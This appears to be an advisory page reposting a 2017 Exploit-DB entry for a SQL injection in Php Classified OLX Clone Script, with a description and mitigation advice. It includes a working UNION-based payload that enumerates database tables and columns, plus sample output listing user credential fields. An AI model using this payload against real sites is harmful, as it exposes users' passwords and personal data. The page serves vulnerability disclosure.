Php Classified OLX Clone Script - SQL Injection

vendor:

Php Classified OLX Clone Script

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Php Classified OLX Clone Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Php Classified OLX Clone Script – SQL Injection

An SQL injection vulnerability exists in the Php Classified OLX Clone Script, which allows an attacker to extract sensitive information from the database. The vulnerability is triggered when an attacker sends a specially crafted SQL query to the vulnerable parameter 'search_key' in the 'search' page. This allows the attacker to extract information such as usernames, passwords, full names, and emails from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Php Classified OLX Clone Script - SQL Injection
# Google Dork: N/A
# Date: 02.03.2017
# Vendor Homepage: https://wptit.com/
# Software: https://wptit.com/portfolio/php-classified-website-sale/
# Demo: http://www.adsthem.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?search_key=IhsanSencan&category=[SQL]
# -30+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- -
# Etc....
# :username<li>atulya_moderators
# :password<li>atulya_moderators
# :fullname<li>atulya_moderators
# :email<li>atulya_moderators
# # # # #